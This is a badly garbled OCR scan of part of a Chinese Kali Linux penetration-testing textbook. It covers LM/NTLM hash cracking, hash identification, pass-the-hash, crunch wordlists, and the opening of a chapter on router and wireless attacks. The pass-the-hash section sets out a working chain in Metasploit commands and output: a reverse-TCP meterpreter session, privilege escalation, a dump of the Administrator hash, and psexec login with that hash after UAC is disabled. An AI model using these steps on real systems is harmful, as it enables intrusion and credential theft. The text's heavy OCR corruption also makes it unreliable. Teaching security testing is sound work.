种 名 为 LM 哈 硕 的 加 密 模 式 。 下 面 我 们 束 给 出 加 密 的 过 程 : 


e 输入 的 密码 值 最 多 为 14 个 字符 。 

。 将 输入 的 密码 转换 为 大 写字 从 。 

。 将 密码 大 写 之 后 转换 为 十 六 进 制 字 符 串 。 

e 密码 不 中 14 字 节 将 会 用 0 来 促 全 。 

e 固定 长 上 度 的 密码 被 分 成 两 组 7byte 部 分 。 

。 将 每 一 组 7 字 市 的 十 六 进 制 转 换 为 二 进 制 ， 每 7bit 一 组 末尾 加 0， 再 
转换 成 十 六 进 制 组 成 得 到 2 组 8 字 节 的 编码 。 

° 二 步骤 得 到 的 8byte 二 组 ， 分 别 作 为 DES key 73*KGS(9$$96 ”进行 加 


e 将 二 组 DES 加 密 后 的 编码 拼接 ， 得 到 最 终 LM 哈 硕 伍 。 


后 来 对 这 个 算法 进行 了 改进 ， 目 前 的 操作 系统 拥有 多 种 加 密 方 法 ， 
其 中 一 种 最 为 有 效 的 方法 是 束 是 “Salting the password", PrisHsalt, 3 


EAM Ea Vm. SHP BUYER OBS EEM ， 由 系统 目 动 
往 这 个 密码 里 加 一 些 “Salt 值 ”， 这 个 值 是 由 系统 随机 生成 的 ， 并 且 只 有 
系统 知道 。 然 后 骨 散 列 。 而 当 用 户 登 录 时 ， 系 统 为 用 户 提 供 的 代码 撤 上 
同样 的 “Salt 值 ”， 然 后 散 列 ， 骨 比较 敬 列 值 ， 然 后 确定 密码 是 任 正 确 。 
这 样 ， 即 便 两 个 用 户 使 用 了 同一 个 密码 ， 由 于 系统 为 它们 生成 的 Salt 值 
不 同 ， 他 们 的 散 列 信也 十 不 同 的 。 即 便 黑 客 可 以 通过 目 己 的 密码 和 目 己 
生成 的 散 列 值 来 找 具 有 特定 密码 的 用 户 ， 但 这 个 几率 太 小 了 《 黎 但 和 
salt 值 都 得 和 黑客 使 用 的 一 样 才 行 ) 。 不 过 LM 哈 希 算 法 中 并 没有 使 用 这 
个 机 制 ， 所 以 虽然 我 们 不 能 直接 由 hash 值 推导 出 密码 ， 但 是 两 个 相同 的 
45 I3 XETTLM hash 加 密 之 后 的 值 是 相同 的 ， 因 此 也 为 我 们 提供 了 破解 LM 
哈 希 加 秘密 人 码 的 方法 。 


13.3.2 ”在 线 破 解 LM 密 但 


现在 有 很 多 网 站 都 提供 了 航 解 LM 哈 硕 加 蜜 密码 的 服务 ， 也 融 是 说 
你 只 需要 在 这 些 网 站 上 提交 找到 的 hash 值 ， 这 些 网 站 就 会 在 自己 的 数据 
库 里 面 进行 比 对 ， 如 果 找 到 这 个 哈 希 值 的 话 ， 束 可 以 得 到 对 应 的 密码 
了 。 这 些 网 站 大 都 是 用 一 种 名 为 彩虹 表 的 技术 。 你 可 以 访问 
http://www.objectif-securite.ch/en/ophcrack.php?K E ILE £X fi fte LM 45 A 
NT 蛤 名 的 密码 。 图 13-30 给 出 了 这 个 网 站 的 截图 ， 其 中 右 下 方 的 两 个 文 
本 框 束 可 以 实现 密码 哈 厦 加密 的 运算 。 





图 13-30 objectif-securite 网 站 的 页 面 


可 以 先 蚂 试 一 些 第 见 密 人 码 的 哈 布 值 破 解 ( 当 然 这 是 出 于 实验 的 目 
的 ) ， 然 后 逐渐 加 大 密码 的 难度 。 下 面 我 们 对 一 个 已 经 加 蜜 的 


(i *32ed87bdb5fdc5e9cba88547376818d4" (NT 哈 希 加 密 ) 进行 破解 ， 破 
解 的 结果 如 图 13-31 所 示 。 





813-31 RAEM nS] e 


在 线 人 破解 需要 进行 排队 ， 这 个 网 站 主页 的 下 方 提供 了 彩虹 表 下 载 ， 
我 们 可 以 下 载 这 些 彩 虹 表 到 本 机 使 用 。 


前 两 个 彩 虹 表 是 免费 的 ， 分 别 保存 了 LM 哈 硕 和 NTI 哈 硕 两 种 加 密 方 
式 的 数据 。 





图 13-32 可 以 下 载 的 彩虹 表 


13.3.3 ”在 Kali Linux F Wt REIS HB 


在 线 人 破解 哈 希 值 十 分 简单 ， 下 面 我 们 也 来 看 看 如 何在 Kali Linux 
破解 哈 希 值 ， 这 里 我 们 可 以 使 用 工具 “Find my hash”， 这 个 工具 的 语法 
为 : 


findmyhash«Encryption Type» -h hash 


实际 应 用 中 ， 这 个 工具 其 实 最 适合 用 来 破解 MD5 加 密 的 哈 硕 ， 并 不 
适合 LM 或 者 NTLM 加 密 的 窗 码 破解 。 这 里 面 我 们 所 到 了 MD5、LM、 
NTLM 这 3 种 加 密 方 法 ， 那 么 我 们 如 何 知道 手中 的 Hash 值 是 通过 哪 一 种 
加 密 方 法 得 到 的 呢 ? 这 一 点 很 关键 ， 因 为 不 同 的 加 密 方法 也 有 不 同 的 解 
密 方式 。 同 样 Kali 中 提供 了 两 种 用 来 分 辨 不 同 加 复方 式 的 工具 : 一 种 


是 “hash-identifier”， 另 一 个 是 Hash ID. 


Hash-identifier 的 使 用 方法 很 简单 。 在 Kali Linux 2# BH 2J] —^| 2X m Ay 
入 “hash-identifier*”， 如 图 13-33 所 示 。 


root@kali: ~ o oo 
File Edit View Search Terminal Help 
:~# hash-identifier 
3HHHEHHHHEHHHEHHHBHEEHHHNEEHHHEEHHTBNEHHHHBNHEHHHHEEHH?BNEHEHHMBNHHHHMSNHEHHHHNHEHHHHBNHHHHBNHHHHHEHHHHNHHE 
# 
EN NANEN 
V NENNEN EE E 
VUE 一 Ne 
V NN UD 
VN ,7A | 
WAV a EM. 
By Zion3R # 
www.Blackploit.com £ 
RootaBlackploit.com £ 
3HHHEHHHHEHHHHEHHHHEHHHHHEHHHHEHHHHEHHHHHHHHHHHHHHHHEHHHHEHHHHHHHHHHHHHHHHHEHHHEHS 


# 
E 
E 
z 
# 
E 
E 
E 
* 
# 





HASH: 


图 13-33 ”hash-identifier 的 工作 界面 
将 加 蜜 之 后 的 哈 硕 信 输入。 


hash-identifier 就 会 分 析出 输入 值 的 可 能 加 密 方 式 ， 如 网 13-34 所 示 ， 
完成 以 后 使 用 ctrl-c 退 出 即 可 。 


root@kali: ~ o o Q 
File Edit View Search Terminal Help 
Possible Hashs : 
[+] MDS 
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtoLower($username) ) ) 


Least Possible Hashs : 


十 
+] MD5(HMAC) 
MD4 (HMAC) 
+] MD2(HMAC) 
4 MD5 (HMAC (Wordpress) ) 


Haval-128 
+] Haval-128(HMAC) 
+] RipeMD-128 
+] RipeMD-128 (HMAC) 
SNEFRU-128 


SNEFRU- 128 (HMAC) 
+] Tiger-128 
+] Tiger-128(HMAC) 
md5($pass.$salt 
+ md5($salt.$pass) 





图 13-34 hash-identifier 的 结果 


737 Hash ID 也 是 一 个 十 分 有 效 的 工具 ， 打 开 一 个 终 关 ， 然 后 输入 
hashid， 然 后 输入 要 破解 的 哈 希 值 ， 按 下 回 车 键 。 


如 图 13-35 所 示 ，Hash ID 列 出 了 这 个 值 的 可 能 加 密 方 式 ， 但 是 这 里 
面 列 出 的 方式 很 多 ， 我 们 还 需要 进行 测试 。 


root@kali: ~ ooo 


w Search Terminal Help 

:~# hashid FAE8BB9ECB799902AAD3B435B51404EE 

Analyzing 'FAE8BB9ECB799902AAD3B435B51404EE ' 
+] MD2 





十 V 
n IPEMD-128 
+] Haval-128 


0 


十 main Cac 
4 SSEC (NSE 
+] RAdmin v2. 


X 


图 13-35 ”hash-id 的 计算 结 
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在 上 一 节 中 ， 我 们 已 经 介绍 了 如 何人 破解 基于 LM 哈 和希 方 法 加 密 的 
Windows 密 但 ， 但 是 windows 中 除了 会 使 用 LM 哈 硕 方 法 乙 外 ， 还 会 使 用 
NTLM 加 密 方 法 对 密码 进行 加 密 。 这 是 一 种 要 比 LM 哈 希 安全 性 高 很 多 
的 方法 。 刚 才 我 们 只 花费 了 一 点 时 间 束 实现 了 对 LM 哈 希 加 密 密 码 的 破 
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而 实际 上 ， 我 们 无 需 去 进行 这 个 密码 的 破解 工作 。 如 果 已 经 取得 了 
一 台 计 算 机 中 的 加 密 之 后 的 密码 值 ， 无 论 是 使 用 LM 哈 希 还 是 NTLM 哈 
硕 加 密 的 ， 我 们 都 可 以 利用 这 个 信和 直接 获得 系统 的 权限 ， 这 种 方法 被 称 
为 “ 哈 希 值 传 递 攻击 ”。 这 十 一 种 经 典 的 攻击 方法 ， 虽 然 每 一 种 网 络 攻击 
方法 怪 慢 地 者 会 过 时 ， 但 是 这 种 攻击 方法 目前 仍 然 可 以 起 作用 ， 而 且 这 
种 攻击 方法 也 可 以 为 我 们 提供 一 个 优秀 的 思路 。 


目前 最 新 的 操作 系统 采用 了 一 些 可 以 阻止 这 种 “ 哈 希 值 传递 攻击 ”的 
机 制 ， 目 前 的 Windows 7 操作 系统 吏 使 用 了 用 户 账 户 控制 (User Account 
Control) 技 术 。 这 个 技术 最 早出 现 于 Windows Vista， 并 在 更 高 版 本 的 操 
作 系 统 中 保留 了 下 来 ， 它 可 以 阻止 恶意 程序 (有 时 也 称 为 “恶意 软件 ”) 
损坏 系统 ， 同 时 也 可 以 帮助 组 织 部 普 更 易于 管理 的 平台 。 


使 用 UAC， 应 用 程序 和 任务 忠 是 在 非 党 理 员 账 户 的 安全 权限 中 运 
行 ， 但 官 理 员 专 门 给 系统 授予 过 理 员 级 别 的 访问 权限 时 除外 。UAC 会 阻 
止 未 经 授权 应 用 程序 的 目 动 安 农 ， 防 止 无 意 中 对 系统 设置 进行 更改 。 这 
种 机 制 已 经 解决 了 Windows XP 的 大 量 安全 方面 的 问题 。 但 是 这 种 机 制 
是 可 以 关闭 的 。 所 以 “ 哈 希 值 传递 攻击 ”这 种 方法 仍然 有 我 们 值得 学 习 的 


地 方 。 

现在 我 们 以 一 个 装 有 Windows 7 操作 系统 的 虚拟 机 来 作为 攻击 的 目 
标 。 我 们 需要 做 一 些 准备 工作 ， 首 先 开 局 Windows 7 操作 系统 中 的 文件 
共享 功能 ， 最 简单 的 做 法 天 是 共享 一 个 文件 严 。 这 一 点 很 重要 ， 如 果 我 
们 不 这 样 做 的 话 ， 束 无 法 实现 远程 攻击 。 

我 们 要 关闭 这 个 系统 上 的 UAC 功 能 ， 关 闭 的 步骤 如 下 所 示 。 

1) 在 开始 采 单 的 运行 中 输入 UAC， 如 图 13-36 所 示 。 


feret (1) 
P 更 改 用 户 帐户 控制 设置 


D mamie 
x | | Xl m EM 
图 13-36 在 运行 中 输入 UAC 


2) 这 样 束 可 以 打开 “用 户 账户 控制 设置 "， 然 后 将 这 里 面 左 侧 的 滑 
动 条 拖 动 到 最 下 方 ， 如 图 13-37 所 示 。 


选择 何 时 通知 您 有 关 计算 机 更 改 的 消息 
用 户 帐户 控制 有 助 于 预防 有 害 程 序 对 您 的 计算 机 进行 更 改 。 
户 帐户 控制 设 信息 


出 现 以 下 情况 时 始终 不 要 通知 我 : 
e 程序 试图 安装 软件 或 更 改 我 的 计算 机 
e ZEMI Windows 设置 


O FES. EZEREK Windows 7 认证 的 程 
序 时 ， 才 选择 此 选项 ， 因 为 这 些 程序 不 支持 用 户 帐户 
控制 。 


T (m. 





图 13-37 ”将 计算 机 消息 改 为 从 不 通知 
3) 然后 单 击 “ 确 定 >， 重 新 启动 计算 机 。 


好 了 ， 现 在 束 可 以 开始 我 们 的 攻击 了 了。 前 先 我 们 需要 想 办 法 获得 日 
标 系 统 的 加 和 密 之 后 的 密码 哈 希 值 ， 之 有 前 我 们 已 经 介绍 了 两 种 方法 。 束 是 
利用 winpe 启 动 系 统 ， 然 后 复制 出 这 个 sam 文 件 。 


夯 外 当 我 们 利用 metasploit 控 制 住 目标 计算 机 的 时 候 ， 也 可 以 获取 和 它 
的 密码 哈 锅 值 。 下 和 面 我 们 来 演示 一 下 ， 当 我 们 获取 了 一 个 目标 上 的 
meterpreter 权 限 之 后 ， 如 何 获 取 它 的 密码 哈 希 仁 ， 如 图 13-38 所 示 。 


> use exploit/multi/handler 
exploit( ) > set payload windows/meterpreter/reverse tcp 
-» windows/meterpreter/reverse tcp 
sf exploit( )» set lhost 192.168.1.104 
ost -» 192.168.1.104 
it ) > set Lport 8888 





) > exploit 
handler on 192.168.1.104:8888 


Started reverse TCP 
Starting the payload handler... 
Sending stage (957487 bytes) to 192.168.1.101 


Meterpreter session 1 opened (192.168.1.104:8888 -> 192.168.1.101:49171) at 
2017-09-20 21:32:42 -0400 





图 13-38 ”使 用 一 个 meterpreter 


下 面 我 们 要 从 已 经 成 功 渗 透 的 计算 机 中 导出 加 密 之 后 的 密 但 什 ， 这 
个 操作 需要 系统 级 〈 管 理 员 ) 级 别 的 控制 权限 ， 而 且 需 要 关闭 目标 上 的 
UAC 机 制 。 在 我 们 这 个 实验 中 ， 事 先 已 经 天 财 了 UAC 机 制 所 以 无 需 再 
进行 这 方面 的 操作 。 如 果 事 先 没 有 关闭 的 话 ， 残 可 以 使 用 
bypassuac_injection 模 块 来 远程 关闭 。 本 实验 中 ， 我 们 只 需要 提高 系统 的 


控制 权限 即 可 ， 这 里 我 们 可 以 使 用 “getsystem” 命 令 ， 如 图 13-39 所 示 。 





图 13-39 ”获取 系统 级 管理 权限 


好 了 ， 我 们 已 经 提升 了 控制 权限 ， 然 后 我 们 使 用 getuid 获 取 机 天 
名 ， 如 图 13-40 所 示 。 


erpreter > getuid 
r username: NT AUTHORITYNSYSTEM 


图 13-40 ”获取 用 户 名 





好 了 ， 最 对 要 的 地 方 开始 了 ， 现 在 我 们 束 可 以 开始 导出 目标 系统 的 
密码 hash 值 了， 使 用 的 命令 是 hashdump， 如 图 13-41 所 示 。 


meterpreter > hashdump 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c08 





9c0::: 
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d1l16ae931b73c59d7e0c089c0: : : 


图 13-41 St ARAS S B 
好 了 ， 记 下 来 这 个 值 。 现 在 我 们 拥有 了 这 人 台 主 机 的 用 户 名 和 警 码 加 
答 以 后 的 hash 值 ， 如 采 我 们 可 以 像 拥 有 用 户 名 和 密码 一 样 地 登录 系统 融 
好 了 ，Metasploit 中 的 psexec 可 以 帮助 我 们 完成 这 个 任务 。 
1) 首先 使 用 exit 命 令 退 出 当前 的 会 话 。 


2) 然后 局 动 psexec 模 块 ， 如 图 13-42 所 示 。 





图 13-42 ”局 用 psexec 模 块 


3) 使 用 Show options 介 看 这 个 模块 的 用 法 。 


这 里 面 我 们 必须 设置 的 参数 包括 远程 主机 的 卫 地 址 、 远 程 主机 的 用 
户 名 、 远 程 主机 的 密码 ， 如 图 13-43 所 示 ， 当 然 这 里 面 的 密码 指 的 是 我 
们 刚刚 获得 的 密码 加 密 之 后 的 哈 希 值 。 


msf exploit( ) » show options 
Module options (exploit/windows/smb/psexec): 


Name Current Setting Required Description 


RHOST The target address 

RPORT The SMB service port (TCP) 

SERVICE DESCRIPTION Service description to to be 
used on target for pretty listing 


SERVICE DISPLAY NAME The service display name 

SERVICE NAME The service name 

SHARE ADMIN$ The share to connect to, can 
be an admin share pem. C$,...) or a normal read/write folder share 

SMBDomain no The Windows domain to use fo 
r authentication 

SMBPass no The password for the Specifi 
ed username 

SMBUser no The username to authenticate 
as 





图 13-43 ”显示 这 个 模块 的 用 法 
如 图 13-44 所 示 ， 下 面 我 们 来 设置 这 些 参 数 。 


msf exploit( ) > set rhost 192.168.1.101 

rhost -» 192.168.1.101 

msf exploit( )» set SMBUser Administrator 

SMBUser => Administrator 

msf exploit( ) > set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae 
931b73c59d7e0c089c0 

SMBPass => aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 


msf exploit( ) » exploit 


Started reverse TCP handler on 192.168.1.104:4444 
192.168.1.101:445 - Connecting to the server... 
] 192.168.1.101:445 - Authenticating to 192.168.1.101:445 as user 'Administrat 





图 13-44 ”利用 哈 希 值 登 陆 


好 了 ， 现 在 我 们 成 功利 用 这 个 加 密 之 后 的 密码 信 登 录 到 目标 系 乡 
了 ， 怎 么 样 ， 我 们 甚至 完全 不 需要 对 这 个 密码 进行 破解 。 


在 Kali 中 还 包含 了 一 些 专门 用 来 实现 “ 哈 希 传递 攻击 ”的 工具 集合 。 
我 们 可 以 在 菜单 中 启动 这 个 工具 ， 这 些 工 具 位 于 工具 分 类 中 的 05- 密 公 
攻击 中 ， 如 图 13-45 所 示 。 


Favorites 


01 - Information Gathering 


02 - Vulnerability Analysis 


03 - Web Application Analysis 
04 - Database Assessment 
05 - Password Attacks 

e Offline Attacks 

e Online Attacks 


e Passing the Hash tools 


06 - Wireless Attacks 

07 - Reverse Engineering 
08 - Exploitation Tools 
09 - Sniffing & Spoofing 
10 - Post Exploitation 

11 - Forensics 

12 - Reporting Tools 


13 - Social Engineering Tools 


mimikatz 
pth-curl 
pth-net 
pth-openc... 
pth-rpcclient 
pth-smbcli... 
pth-smbget 
pth-sqsh 
pth-winexe 
pth-wmic 


pth-wmis 


DADA 


smbmap 





K13-45 AERIENE 


人 功能 ， 这 里 我 们 以 PTH-winexe 为 例 。 这 个 工 
行 式 的 工具 ， 局 动 之 后 的 界面 如 图 13-46 所 示 。 





Y 


A] 


winexe version 1.1 
This program may be freely redistributed under the terms of the GNU GPLv3 


Usage: winexe [OPTION]... 
Options: 
- --help 


//HOST COMMAND 


- version 


- -user- [DOMAIN/]USERNAME [sPASSWORD] 


--authentication-file-FILE 
--no-pass 
--kerberos=STRING 
--debuglevel=DEBUGLEVEL 
--uninstall 


--reinstall 


--system 
--profile 
- -convert 


- - runas- [DOMAINN]USERNAMEsSPASSWORD 


--runas-file-FILE 


-interactive-0|1 


图 13-46 ”PTH-winexe 的 帮助 界面 
具 的 使 用 语法 如 下 : 


Display help message 

Display version number 

Set the network username 

Get the credentials from a file 
Do not ask for a password 

Use Kerberos, -k [yes|no] 

Set debug Level 

Uninstall winexe service after 
remote execution 

Reinstall winexe Service before 
remote execution 

Use SYSTEM account 

Load user profile 

Try to convert characters 
between local and remote 
code-pages 

Run as the given user (BEWARE: 
this password is sent in 
cleartext over the network!) 
Run as user options defined in a 
file 

Desktop interaction: 0 - 
disallow, 1 - allow. If allow, 
also USe --SyStem switch 








命令 成 功 执行 之 后 整 可 以 获得 目标 主机 的 一 个 命令 行 控制 。 但 古 这 
个 工具 的 使 用 前 提 是 目标 系统 中 必须 天 闭 了 UAC 功 能 。 


13.4 字典 文件 


我 们 在 很 多 影视 作品 中 都 会 看 到 这 个 情节 ， 示 墨客 信 闭 旦 旦 地 伍 
证 “一 天 之 内 我 项 可 以 攻破 这 个 系统 ”， 然后 就 是 特效 ， 显示 屏幕 上 一 个 
义 一 个 的 词汇 不断 地 变换 。 这 个 过 程 正如 我 们 在 本 草 第 一 市 中 讲 过 的 一 
样 。 当 对 密码 进行 破解 的 时 候 ， 一 个 子 典 文件 是 必 不 可 少 的 。 所 谓 的 季 
典 文 件 融 是 一 个 由 大 量词 汇 构成 的 文件 。 


在 Kali linux 2 系统 中 字典 文件 的 来 源 一 共有 3 个 ， 如 下 所 示 。 


e 使 用 字典 生成 工具 来 制造 目 己 需要 的 字典 ， 当 我 们 需要 字典 文件 ， 
六 
字典 文 


e 使 用 Kali Linux K w AJI, Kali Linux 中 将 所 有 的 字典 痢 你 存在 
了 /usr/ share/wordlists/ 目 录 下 ， 如 图 13-47 上 所 示 。 


< > |4 usr share | wordlists metasploit j o" TE = ooo 
合 Home 
æ Desktop es es ENA m. 
dirb dirbuster dns txt fasttra Pm fern-wif 
[| Documen ts 





smap. 
( Downloads m A na m. m 


metasploit nmap.lst rockyou.txt. sqlmap.txt wfuzz 
J) Music 





13-47 Kali linux? H F H E 


e 从 互联 网 上 下 载 热 门 的 字典 ， 你 可 以 访问 


https:/wiki.skullsecurity.org/Passwords 来 否 看 最 新 的 字典 文件 ， 如 图 
13-48 所 示 。 
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[13-48  https://wiki.skullsecurity.org/Passwords"F ^ir MJ y- 


这 一 节 我 们 来 重点 介绍 第 一 种 方法 ， 所 在 Kali Linux 2 操作 系统 中 提 
供 了 大 量 的 字典 生成 工具 ， 所 有 这 些 工 具 中 我 最 推荐 的 就 是 Crunch 这 区 
工具 。Crunch 是 一 蒜 运 行 在 Linux 中 的 字典 生成 工具 ， 它 是 由 Mimayin 和 
Bofh28 所 开发 的 ， 利 用 它 可 以 灵活 地 定制 目 己 的 密码 字典 文件 。 


在 Crunch 的 主页 上 提供 了 这 个 工具 的 使 用 方法 和 范例 。 这 个 工具 的 
使 用 十 分 简单 ， 你 所 做 的 只 是 同 Crunch 迫 供 3 个 值 : 


e 字典 中 包含 词汇 的 最 小 长 度 。 

e 字典 中 包含 词汇 的 最 大 长 度 。 

e 字典 中 包含 词汇 所 使 用 的 字符 。 要 生成 密码 包含 的 字符 集 ( 小 写字 
符 、 大 与 字符 、 数 字 、 人 符号) ， 这 个 选项 是 可 选 的 ， 如 果 不 选 这 个 
选项 ， 将 使 用 默认 字符 集 《〈 默 认为 小 与 字符 ) 。 


剩 下 的 工作 只 需要 区 给 Crunch 去 完成 承 可 以 了 。 下 面 我 们 给 出 一 个 
简单 的 Crunch 使 用 实例 ， 首 先 在 Kali Linux 2 中 局 动 一 个 终 问 窗口 ， 然 后 
输入 “crunch 2 3 —o passwords.txt”， 如 图 13-49 所 示 。 


crunch 2 3 -o /root/passwords.txt 
now generate the following amount of data: 72332 bytes 





图 13-49 ”使 用 Crunch 生 成 的 2 一 3 位 密码 


这 条 命令 将 会 生成 所 有 长 度 为 2 位 和 3 位 的 密码 ， 然 后 将 这 些 密 码 保 
ff-Epasswords.txt"H .. SAI Z^ ^E*"aa"*bb"*aaa"*zzz"z JS, n 
13-50P T5. 


Applications v Places v — [E Text Editor v Mon 22:35 





Open ~ || a passwords it 


图 13-50 ”密码 文件 


如 末 我 们 对 目标 比较 束 匠 的 话 ， 也 可 以 指定 目标 第 用 的 字符 ， 例 如 
我 们 看 到 某 人 的 键盘 上 的 qwert 和 1234 几 个 键 磨 损 得 比较 厉害 的 话 ， 就 
可 以 指定 这 几 个 字符 来 产生 一 个 密码 ， 执 行 的 命令 为 “root@kali: 
~# "crunch 4 4 quert1234 -o password2.txt”*”， 如 图 13-51 所 示 。 


:~# crunch 4 4 qwert1234 -0 pa 


ssword2.tx 
now generate the following amount of 


t 
data: 32805 bytes 


now generate the following number of lines: 6561 





crunch: 100% completed generating output 


图 13-51 f HjfHaE-EfjCrunch/E jk Ad E R3 
生成 的 密码 文件 如 图 13-52 所 示 。 


Applications v Places v — [E] Text Editor ~ Mon 22:39 





Open ~+ || A password2.txt 
qqqq 
qqqw 
qqqe 
qqqr 
qqqt 
qqq1 
qqq2 
qqq3 
qqq4 
qqwq 
qqww 
qqwe 
qqwr 
qqwt 
qqwl 
qqw2 
qqw3 
qqw4 
qqeq 


图 13-52 ”密码 文件 


好 了 ， 现 在 可 以 看 到 我 们 生成 的 密码 只 包含 了 “qwert1234" 字 
符 。 


13.5 ”小结 


在 这 一 章 中 ， 我 们 介绍 了 一 些 网 络 渗透 中 常见 的 密码 破解 方式 。 首 
先 我 们 以 FTP 服 务 为 例 ， 讲 解 了 如 何 使 用 Kali Linux 2 中 的 工具 来 破解 党 
见 的 网 络 服 务 加 蜜 。 接 着 我 们 介绍 了 如 何 针 对 Web 页 面 中 的 密码 进行 破 
解 。 这 两 种 人 破解 方式 采用 的 都 是 又 力 穷 举 ， 昌 然 这 种 方式 在 目前 的 实际 
成 功率 并 不 高 ， 但 却 是 在 渗透 测试 时 必须 要 进行 的 步骤 。 紧 接着 我 们 开 
始 了 对 使 用 哈 希 加 密 密 码 的 破解 ， 哈 希 加 密 算法 有 很 多 ， 因 此 我 们 也 介 
绍 了 如 何 使 用 Kali Linux 2 来 识别 一 个 哈 硕 值 是 采用 了 何 种 加 密 方法 。 本 
章 的 最 后 讲解 了 如 何在 Kali Linux 2 中 使 用 字典 文件 。 


在 现 阶段 ， 密 码 是 一 个 常见 的 认证 方式 ， 除 了 在 网 络 应 用 中 大 量 使 
用 之 外 ， 大 量 软件 也 都 使 用 了 密码 验证 方式 ， 限 于 本 书 的 篇 幅 ， 本 章 只 
介绍 了 前 者 。 下 一 半 我 们 将 会 介绍 当前 极为 热门 的 无 线 安全 渗透 。 


第 14 章 
无 线 安全 渗透 测试 


今 时 今日 ， 人 们 已 经 越 来 越 离 不 开 无 线 网 络 ， 相 比 起 那 种 极为 不 便 
利 的 网 线 连接 方式 ， 这 种 便利 的 无 线 网 络 连接 方式 越 来 越 受 到 人 们 的 如 
爱 ， 儿 乎 成 为 了 每 个 单位 和 家 庭 上 网 方式 的 首选 。 可 二 无 线 网 络 上 网 方 
式 的 普及 除了 市 来 了 便利 之 外 ， 也 为 网 络 的 安全 市 来 了 更 大 的 危险 。 因 
为 传统 的 有 线 连接 方式 ， 对 于 设备 的 毛 入 往往 有 较 六 的 限制 ， 因 此 外 来 
者 在 试图 进入 某 个 网 络 时 难度 较 大 。 有 线 网 络 通过 网 线 连接 计算 机 ， 而 
无 线 网 络 则 是 通过 无 线 电波 来 连 网 。 常 见 的 束 是 一 个 无 线路 由 器 ， 那 么 
TE 3X ANTERA EH i HY FR E mi EP] 4: 20010. EAR n] EA Z6 R XE E73 3 
进行 连 网 ， 而 无 线 网 络 则 降低 了 这 种 入 侵 的 难度 。 


一 般 架 设 无 线 网 络 的 基本 配备 就 是 无 线 网 卡 及 一 台 AP， 如 此 束 能 
以 无 线 的 株式， 配合 既 有 的 有 线 架 构 来 分 享 网 络 资源 ， 架 设 费 用 和 复 林 
程度 远 远 低 于 传统 的 有 线 网 络 。AP 为 Access Point 的 人 简称， 一般 翻译 
为 “无 线 访 问 接 入 点 ”。 有 AP， 就 像 一 般 有 线 网 络 的 Hub 一 般 ， 无 线 客 
户 问 可 以 快速 且 轻 易 地 与 网 络 相 连 。 特 别 是 对 于 完 带 的 使 用 ， 无 线 网 络 
的 优势 更 为 明显 ， 有 线 宽 带 网 络 (ADSL、 小 区 LAN 等 ) 到 户 后 ， 连 接 到 
一 个 AP， 然 后 在 计算 机 中 安装 一 块 无 线 网 卡 即 可 。 


现在 的 AP 大 都 由 无 线路 由 器 宛 当 ， 针 对 这 种 设备 的 入 侵 方 式 包括 
无 线 网 络 蜜 但 的 破解 、 路 由 郑 的 控制 等 。 在 Kali Linux 2 中 专门 有 一 个 分 
茯 的 工具 集合 都 是 针对 无 线 网 络 的 ， 这 里 面 吏 包括 了 极为 井 名 的 
aircrack-ng、Kkismet 等 。 在 这 一 章 中 我 们 将 会 围 经 如 下 几 点 承 如 何 使 用 
这 些 工 具 来 讲解 : 


。 URSI ER EH S833ETI 1235 WT 
e 如 何 扫 持 出 可 连接 的 无 线 网 络 
。 AA IRRIA 


e BITE — I EUER IA SS 
。 人 破解 Wi-Fi 的 密码 
e 使 用 Kismet 进 行 网 络 审计 


14.1 UAT ER EH i 3E TT 12 3: UE TA 
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征 基 于 Linux 的 ， 墨 客 可 以 利用 操作 系统 的 漏洞 进行 攻击 。 万 外 为 了 便 
于 使 用 者 进行 配置 ， 在 路 由 豆 的 操作 系统 中 都 会 内 置 一 个 Web 服 务 亏 ， 
对 外 提供 http 服 务 。 使 用 者 通过 登录 这 个 服务 硕 的 下地 址 ， 束 可 以 打开 
一 个 配置 页 和 面 。 几 14-1 束 给 出 了 一 个 常见 的 路 由 夫 管 理 登录 页 面 。 





图 14-1 一 个 常见 的 路 由 器 管理 登录 页 面 


在 这 个 页 面 中 ， 使 用 者 可 以 完成 使 用 密码 、mac 过 小 、 系 统 重 置 等 
功能 。 因 此 这 个 Web 服 务 器 也 束 成 为 了 黑客 重点 攻击 的 目标 。 


下 和 耐 育 先 来 介绍 一 种 极为 简单 的 攻击 方式 ， 你 可 以 访问 
http://www.routerpwn.com/ 这 个 页 面 ， 如 图 14-2 所 示 。 在 这 个 页 面 中 提供 
了 大 量 的 路 由 器 的 漏 铜 渗透 模块 ， 利 用 这 些 模块 你 可 以 轻 而 多 举 地 对 路 
FH 8834 17 12 322: UU VY e 


fExx vi Hg E75 £u f HAE KARAK] 商 ， 如 图 14-3 上 所 


示 。 里 面 有 我 们 国内 比较 熟悉 的 Cisco、D-Link、TP-Link 等 ， 例 如 我 们 
现在 的 目标 是 一 个 TP-Link 生 产 的 路 由 器 ， 那 么 束 可 以 在 这 里 而 选中 TP- 
Link。 这 时 下 方 将 只 会 展示 与 TP-Link 有 关 的 漏洞 渗透 模块 ， 如 图 14-4 所 
示 。 


routerpwn.com 
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图 14-2  http:z//www.routerpwn.com JA H 
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Asmax D-Link MiFi Seagate TP-LINK Zoom 
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Showing 1 to 9 of 9 entries 





图 14-4 TP-Linkfs l| 91 Hj 


这 里 面 的 漏洞 渗透 模块 是 以 一 个 表 的 形式 显示 ， 一 共 5 列 。 从 左 侧 
ZU. BIERA ERER, "S X EIE. 5E 
模块 的 来 源 ， 第 四 列 是 该 模块 的 标题 ， 第 五 列 是 该 模块 的 作者 。 这 里 面 
需要 注音 的 古 第 二 列 ， 也 束 是 漏洞 渗透 模块 的 种 类 ， 在 这 个 页 面 中 一 共 
将 漏洞 渗 透 便 块 分 成 了 如 下 4 个 种 闫 。 


e Advisory: 这 个 种 关 表 示 提 供 的 是 一 个 链接 ， 点 击 这 个 链接 可 以 奉 
看 这 个 漏洞 渗透 模块 的 信息 。 

e Metasploit Module: 这 个 种 类 也 表示 提供 的 是 一 个 链接 ， 这 个 漏洞 
渗透 模块 可 以 在 Metasploit 中 直接 使 用 。 

e One Click: 这 种 模块 的 使 用 方法 最 为 简单 ， 你 只 需要 人 徐 音 地 单 击 这 
个 模块 儿 下 ， 设 置 瓯 可 以 完成 渗透 。 

e Poc: 这 个 种 类 表示 链接 地 址 提供 的 是 渗透 模块 的 代码 。 


